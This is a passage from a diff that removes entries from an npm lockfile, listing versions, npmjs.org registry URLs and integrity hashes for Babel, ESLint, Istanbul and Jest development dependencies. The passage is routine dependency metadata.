"sha512-tnUA4RsrmflIM6W6RFTLFSXITtl0wKjgpnLgXyowocVPrbYrLUXSBXDgTs8BlbmIzIdlBySRQjINYs2BAkiLtw==", - "dev": true, - "requires": { - "@babel/traverse": "^7.25.9", - "@babel/types": "^7.25.9" - } - }, - "@babel/helper-module-transforms": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.26.0.tgz", - "integrity": "sha512-xO+xu6B5K2czEnQye6BHA7DolFFmS3LB7stHZFaOLb1pAwO1HWLS8fXA+eh0A2yIvltPVmx3eNNDBJA2SLHXFw==", - "dev": true, - "requires": { - "@babel/helper-module-imports": "^7.25.9", - "@babel/helper-validator-identifier": "^7.25.9", - "@babel/traverse": "^7.25.9" - } - }, - "@babel/helper-plugin-utils": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.25.9.tgz", - "integrity": "sha512-kSMlyUVdWe25rEsRGviIgOWnoT/nfABVWlqt9N19/dIPWViAOW2s9wznP5tURbs/IDuNk4gPy3YdYRgH3uxhBw==", - "dev": true - }, - "@babel/helper-string-parser": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.25.9.tgz", - "integrity": "sha512-4A/SCr/2KLd5jrtOMFzaKjVtAei3+2r/NChoBNoZ3EyP/+GlhoaEGoWOZUmFmoITP7zOJyHIMm+DYRd8o3PvHA==", - "dev": true - }, - "@babel/helper-validator-identifier": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.25.9.tgz", - "integrity": "sha512-Ed61U6XJc3CVRfkERJWDz4dJwKe7iLmmJsbOGu9wSloNSFttHV0I8g6UAgb7qnK5ly5bGLPd4oXZlxCdANBOWQ==", - "dev": true - }, - "@babel/helper-validator-option": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.25.9.tgz", - "integrity": "sha512-e/zv1co8pp55dNdEcCynfj9X7nyUKUXoUEwfXqaZt0omVOmDe9oOTdKStH4GmAw6zxMFs50ZayuMfHDKlO7Tfw==", - "dev": true - }, - "@babel/helpers": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.26.0.tgz", - "integrity": "sha512-tbhNuIxNcVb21pInl3ZSjksLCvgdZy9KwJ8brv993QtIVKJBBkYXz4q4ZbAv31GdnC+R90np23L5FbEBlthAEw==", - "dev": true, - "requires": { - "@babel/template": "^7.25.9", - "@babel/types": "^7.26.0" - } - }, - "@babel/parser": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.26.2.tgz", - "integrity": "sha512-DWMCZH9WA4Maitz2q21SRKHo9QXZxkDsbNZoVD62gusNtNBBqDg9i7uOhASfTfIGNzW+O+r7+jAlM8dwphcJKQ==", - "dev": true, - "requires": { - "@babel/types": "^7.26.0" - } - }, - "@babel/plugin-syntax-async-generators": { - "version": "7.8.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", - "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-bigint": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", - "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-class-properties": { - "version": "7.12.13", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", - "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.12.13" - } - }, - "@babel/plugin-syntax-class-static-block": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-static-block/-/plugin-syntax-class-static-block-7.14.5.tgz", - "integrity": "sha512-b+YyPmr6ldyNnM6sqYeMWE+bgJcJpO6yS4QD7ymxgH34GBPNDM/THBh8iunyvKIZztiwLH4CJZ0RxTk9emgpjw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.14.5" - } - }, - "@babel/plugin-syntax-import-attributes": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-attributes/-/plugin-syntax-import-attributes-7.26.0.tgz", - "integrity": "sha512-e2dttdsJ1ZTpi3B9UYGLw41hifAubg19AtCu/2I/F1QNVclOBr1dYpTdmdyZ84Xiz43BS/tCUkMAZNLv12Pi+A==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.25.9" - } - }, - "@babel/plugin-syntax-import-meta": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", - "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-json-strings": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", - "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-jsx": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.25.9.tgz", - "integrity": "sha512-ld6oezHQMZsZfp6pWtbjaNDF2tiiCYYDqQszHt5VV437lewP9aSi2Of99CK0D0XB21k7FLgnLcmQKyKzynfeAA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.25.9" - } - }, - "@babel/plugin-syntax-logical-assignment-operators": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", - "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-nullish-coalescing-operator": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", - "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-numeric-separator": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", - "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-object-rest-spread": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", - "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-optional-catch-binding": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", - "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-optional-chaining": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", - "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-private-property-in-object": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-private-property-in-object/-/plugin-syntax-private-property-in-object-7.14.5.tgz", - "integrity": "sha512-0wVnp9dxJ72ZUJDV27ZfbSj6iHLoytYZmh3rFcxNnvsJF3ktkzLDZPy/mA17HGsaQT3/DQsWYX1f1QGWkCoVUg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.14.5" - } - }, - "@babel/plugin-syntax-top-level-await": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", - "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.14.5" - } - }, - "@babel/plugin-syntax-typescript": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.25.9.tgz", - "integrity": "sha512-hjMgRy5hb8uJJjUcdWunWVcoi9bGpJp8p5Ol1229PoN6aytsLwNMgmdftO23wnCLMfVmTwZDWMPNq/D1SY60JQ==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.25.9" - } - }, - "@babel/template": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.25.9.tgz", - "integrity": "sha512-9DGttpmPvIxBb/2uwpVo3dqJ+O6RooAFOS+lB+xDqoE2PVCE8nfoHMdZLpfCQRLwvohzXISPZcgxt80xLfsuwg==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.25.9", - "@babel/parser": "^7.25.9", - "@babel/types": "^7.25.9" - } - }, - "@babel/traverse": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.25.9.tgz", - "integrity": "sha512-ZCuvfwOwlz/bawvAuvcj8rrithP2/N55Tzz342AkTvq4qaWbGfmCk/tKhNaV2cthijKrPAA8SRJV5WWe7IBMJw==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.25.9", - "@babel/generator": "^7.25.9", - "@babel/parser": "^7.25.9", - "@babel/template": "^7.25.9", - "@babel/types": "^7.25.9", - "debug": "^4.3.1", - "globals": "^11.1.0" - }, - "dependencies": { - "globals": { - "version": "11.12.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", - "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", - "dev": true - } - } - }, - "@babel/types": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.26.0.tgz", - "integrity": "sha512-Z/yiTPj+lDVnF7lWeKCIJzaIkI0vYO87dMpZ4bg4TDrFe4XXLFWL1TbXU27gBP3QccxV9mZICCrnjnYlJjXHOA==", - "dev": true, - "requires": { - "@babel/helper-string-parser": "^7.25.9", - "@babel/helper-validator-identifier": "^7.25.9" - } - }, - "@bcoe/v8-coverage": { - "version": "0.2.3", - "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", - "dev": true - }, - "@eslint-community/eslint-utils": { - "version": "4.4.0", - "resolved": "https://registry.npmjs.org/@eslint-community/eslint-utils/-/eslint-utils-4.4.0.tgz", - "integrity": "sha512-1/sA4dwrzBAyeUoQ6oxahHKmrZvsnLCg4RfxW3ZFGGmQkSNQPFNLV9CUEFQP1x9EYXHTo5p6xdhZM1Ne9p/AfA==", - "dev": true, - "peer": true, - "requires": { - "eslint-visitor-keys": "^3.3.0" - } - }, - "@eslint-community/regexpp": { - "version": "4.5.1", - "resolved": "https://registry.npmjs.org/@eslint-community/regexpp/-/regexpp-4.5.1.tgz", - "integrity": "sha512-Z5ba73P98O1KUYCCJTUeVpja9RcGoMdncZ6T49FCUl2lN38JtCJ+3WgIDBv0AuY4WChU5PmtJmOCTlN6FZTFKQ==", - "dev": true, - "peer": true - }, - "@eslint/eslintrc": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/@eslint/eslintrc/-/eslintrc-2.1.0.tgz", - "integrity": "sha512-Lj7DECXqIVCqnqjjHMPna4vn6GJcMgul/wuS0je9OZ9gsL0zzDpKPVtcG1HaDVc+9y+qgXneTeUMbCqXJNpH1A==", - "dev": true, - "peer": true, - "requires": { - "ajv": "^6.12.4", - "debug": "^4.3.2", - "espree": "^9.6.0", - "globals": "^13.19.0", - "ignore": "^5.2.0", - "import-fresh": "^3.2.1", - "js-yaml": "^4.1.0", - "minimatch": "^3.1.2", - "strip-json-comments": "^3.1.1" - } - }, - "@eslint/js": { - "version": "8.44.0", - "resolved": "https://registry.npmjs.org/@eslint/js/-/js-8.44.0.tgz", - "integrity": "sha512-Ag+9YM4ocKQx9AarydN0KY2j0ErMHNIocPDrVo8zAE44xLTjEtz81OdR68/cydGtk6m6jDb5Za3r2useMzYmSw==", - "dev": true, - "peer": true - }, - "@humanwhocodes/config-array": { - "version": "0.11.10", - "resolved": "https://registry.npmjs.org/@humanwhocodes/config-array/-/config-array-0.11.10.tgz", - "integrity": "sha512-KVVjQmNUepDVGXNuoRRdmmEjruj0KfiGSbS8LVc12LMsWDQzRXJ0qdhN8L8uUigKpfEHRhlaQFY0ib1tnUbNeQ==", - "dev": true, - "peer": true, - "requires": { - "@humanwhocodes/object-schema": "^1.2.1", - "debug": "^4.1.1", - "minimatch": "^3.0.5" - } - }, - "@humanwhocodes/module-importer": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/@humanwhocodes/module-importer/-/module-importer-1.0.1.tgz", - "integrity": "sha512-bxveV4V8v5Yb4ncFTT3rPSgZBOpCkjfK0y4oVVVJwIuDVBRMDXrPyXRL988i5ap9m9bnyEEjWfm5WkBmtffLfA==", - "dev": true, - "peer": true - }, - "@humanwhocodes/object-schema": { - "version": "1.2.1", - "resolved": "https://registry.npmjs.org/@humanwhocodes/object-schema/-/object-schema-1.2.1.tgz", - "integrity": "sha512-ZnQMnLV4e7hDlUvw8H+U8ASL02SS2Gn6+9Ac3wGGLIe7+je2AeAOxPY+izIPJDfFDb7eDjev0Us8MO1iFRN8hA==", - "dev": true, - "peer": true - }, - "@isaacs/cliui": { - "version": "8.0.2", - "resolved": "https://registry.npmjs.org/@isaacs/cliui/-/cliui-8.0.2.tgz", - "integrity": "sha512-O8jcjabXaleOG9DQ0+ARXWZBTfnP4WNAqzuiJK7ll44AmxGKv/J2M4TPjxjY3znBCfvBXFzucm1twdyFybFqEA==", - "requires": { - "string-width": "^5.1.2", - "string-width-cjs": "npm:string-width@^4.2.0", - "strip-ansi": "^7.0.1", - "strip-ansi-cjs": "npm:strip-ansi@^6.0.1", - "wrap-ansi": "^8.1.0", - "wrap-ansi-cjs": "npm:wrap-ansi@^7.0.0" - }, - "dependencies": { - "ansi-regex": { - "version": "6.1.0", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-6.1.0.tgz", - "integrity": "sha512-7HSX4QQb4CspciLpVFwyRe79O3xsIZDDLER21kERQ71oaPodF8jL725AgJMFAYbooIqolJoRLuM81SpeUkpkvA==" - }, - "ansi-styles": { - "version": "6.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-6.2.1.tgz", - "integrity": "sha512-bN798gFfQX+viw3R7yrGWRqnrN2oRkEkUjjl4JNn4E8GxxbjtG3FbrEIIY3l8/hrwUwIeCZvi4QuOTP4MErVug==" - }, - "emoji-regex": { - "version": "9.2.2", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-9.2.2.tgz", - "integrity": "sha512-L18DaJsXSUk2+42pv8mLs5jJT2hqFkFE4j21wOmgbUqsZ2hL72NsUU785g9RXgo3s0ZNgVl42TiHp3ZtOv/Vyg==" - }, - "string-width": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-5.1.2.tgz", - "integrity": "sha512-HnLOCR3vjcY8beoNLtcjZ5/nxn2afmME6lhrDrebokqMap+XbeW8n9TXpPDOqdGK5qcI3oT0GKTW6wC7EMiVqA==", - "requires": { - "eastasianwidth": "^0.2.0", - "emoji-regex": "^9.2.2", - "strip-ansi": "^7.0.1" - } - }, - "strip-ansi": { - "version": "7.1.0", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-7.1.0.tgz", - "integrity": "sha512-iq6eVVI64nQQTRYq2KtEg2d2uU7LElhTJwsH4YzIHZshxlgZms/wIc4VoDQTlG/IvVIrBKG06CrZnp0qv7hkcQ==", - "requires": { - "ansi-regex": "^6.0.1" - } - }, - "wrap-ansi": { - "version": "8.1.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-8.1.0.tgz", - "integrity": "sha512-si7QWI6zUMq56bESFvagtmzMdGOtoxfR+Sez11Mobfc7tm+VkUckk9bW2UeffTGVUbOksxmSw0AA2gs8g71NCQ==", - "requires": { - "ansi-styles": "^6.1.0", - "string-width": "^5.0.1", - "strip-ansi": "^7.0.1" - } - } - } - }, - "@isaacs/fs-minipass": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/@isaacs/fs-minipass/-/fs-minipass-4.0.1.tgz", - "integrity": "sha512-wgm9Ehl2jpeqP3zw/7mo3kRHFp5MEDhqAdwy1fTGkHAwnkGOVsgpvQhL8B5n1qlb01jV3n/bI0ZfZp5lWA1k4w==", - "requires": { - "minipass": "^7.0.4" - } - }, - "@istanbuljs/load-nyc-config": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", - "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", - "dev": true, - "requires": { - "camelcase": "^5.3.1", - "find-up": "^4.1.0", - "get-package-type": "^0.1.0", - "js-yaml": "^3.13.1", - "resolve-from": "^5.0.0" - }, - "dependencies": { - "argparse": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", - "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", - "dev": true, - "requires": { - "sprintf-js": "~1.0.2" - } - }, - "find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", - "dev": true, - "requires": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - } - }, - "js-yaml": { - "version": "3.14.1", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", - "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", - "dev": true, - "requires": { - "argparse": "^1.0.7", - "esprima": "^4.0.0" - } - }, - "locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", - "dev": true, - "requires": { - "p-locate": "^4.1.0" - } - }, - "p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", - "dev": true, - "requires": { - "p-try": "^2.0.0" - } - }, - "p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", - "dev": true, - "requires": { - "p-limit": "^2.2.0" - } - }, - "resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true - } - } - }, - "@istanbuljs/schema": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", - "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", - "dev": true - }, - "@jest/console": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.7.0.tgz", - "integrity": "sha512-5Ni4CU7XHQi32IJ398EEP4RrB8eV09sXP2ROqD4bksHrnTree52PsxvX8tpL8LvTZ3pFzXyPbNQReSN41CAhOg==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "slash": "^3.0.0" - } - }, - "@jest/core": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.7.0.tgz", - "integrity": "sha512-n7aeXWKMnGtDA48y8TLWJPJmLmmZ642Ceo78cYWEpiD7FzDgmNDV/GCVRorPABdXLJZ/9wzzgZAlHjXjxDHGsg==", - "dev": true, - "requires": { - "@jest/console": "^29.7.0", - "@jest/reporters": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-changed-files": "^29.7.0", - "jest-config": "^29.7.0", - "jest-haste-map": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-resolve-dependencies": "^29.7.0", - "jest-runner": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "jest-watcher": "^29.7.0", - "micromatch": "^4.0.4", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "strip-ansi": "^6.0.0" - } - }, - "@jest/environment": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.7.0.tgz", - "integrity": "sha512-aQIfHDq33ExsN4jP1NWGXhxgQ/wixs60gDiKO+XVMd8Mn0NWPWgc34ZQDTb2jKaUWQ7MuwoitXAsN2XVXNMpAw==", - "dev": true, - "requires": { - "@jest/fake-timers": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-mock": "^29.7.0" - } - }, - "@jest/expect": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.7.0.tgz", - "integrity": "sha512-8uMeAMycttpva3P1lBHB8VciS9V0XAr3GymPpipdyQXbBcuhkLQOSe8E/p92RyAdToS6ZD1tFkX+CkhoECE0dQ==", - "dev": true, - "requires": { - "expect": "^29.7.0", - "jest-snapshot": "^29.7.0" - } - }, - "@jest/expect-utils": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.7.0.tgz", - "integrity": "sha512-GlsNBWiFQFCVi9QVSx7f5AgMeLxe9YCCs5PuP2O2LdjDAA8Jh9eX7lA1Jq/xdXw3Wb3hyvlFNfZIfcRetSzYcA==", - "dev": true, - "requires": { - "jest-get-type": "^29.6.3" - } - }, - "@jest/fake-timers": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.7.0.tgz", - "integrity": "sha512-q4DH1Ha4TTFPdxLsqDXK1d3+ioSL7yL5oCMJZgDYm6i+6CygW5E5xVr/D1HdsGxjt1ZWSfUAs9OxSB/BNelWrQ==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "@sinonjs/fake-timers": "^10.0.2", - "@types/node": "*", - "jest-message-util": "^29.7.0", - "jest-mock": "^29.7.0", - "jest-util": "^29.7.0" - } - }, - "@jest/globals": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.7.0.tgz", - "integrity": "sha512-mpiz3dutLbkW2MNFubUGUEVLkTGiqW6yLVTA+JbP6fI6J5iL9Y0Nlg8k95pcF8ctKwCS7WVxteBs29hhfAotzQ==", - "dev": true, - "requires": { - "@jest/environment": "^29.7.0", - "@jest/expect": "^29.7.0", - "@jest/types": "^29.6.3", - "jest-mock": "^29.7.0" - } - }, - "@jest/reporters": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.7.0.tgz", - "integrity": "sha512-DApq0KJbJOEzAFYjHADNNxAE3KbhxQB1y5Kplb5Waqw6zVbuWatSnMjE5gs8FUgEPmNsnZA3NCWl9NG0ia04Pg==", - "dev": true, - "requires": { - "@bcoe/v8-coverage": "^0.2.3", - "@jest/console": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@jridgewell/trace-mapping": "^0.3.18", - "@types/node": "*", - "chalk": "^4.0.0", - "collect-v8-coverage": "^1.0.0", - "exit": "^0.1.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "istanbul-lib-coverage": "^3.0.0", - "istanbul-lib-instrument": "^6.0.0", - "istanbul-lib-report": "^3.0.0", - "istanbul-lib-source-maps": "^4.0.0", - "istanbul-reports": "^3.1.3", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "jest-worker": "^29.7.0", - "slash": "^3.0.0", - "string-length": "^4.0.1", - "strip-ansi": "^6.0.0", - "v8-to-istanbul": "^9.0.1" - } - }, - "@jest/schemas": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.6.3.tgz", - "integrity": "sha512-mo5j5X+jIZmJQveBKeS/clAueipV7KgiX1vMgCxam1RNYiqE1w62n0/tJJnHtjW8ZHcQco5gY85jA3mi0L+nSA==", - "dev": true, - "requires": { - "@sinclair/typebox": "^0.27.8" - } - }, - "@jest/source-map": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.6.3.tgz", - "integrity": "sha512-MHjT95QuipcPrpLM+8JMSzFx6eHp5Bm+4XeFDJlwsvVBjmKNiIAvasGK2fxz2WbGRlnvqehFbh07MMa7n3YJnw==", - "dev": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.18", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - } - }, - "@jest/test-result": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.7.0.tgz", - "integrity": "sha512-Fdx+tv6x1zlkJPcWXmMDAG2HBnaR9XPSd5aDWQVsfrZmLVT3lU1cwyxLgRmXR9yrq4NBoEm9BMsfgFzTQAbJYA==", - "dev": true, - "requires": { - "@jest/console": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - } - }, - "@jest/test-sequencer": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.7.0.tgz", - "integrity": 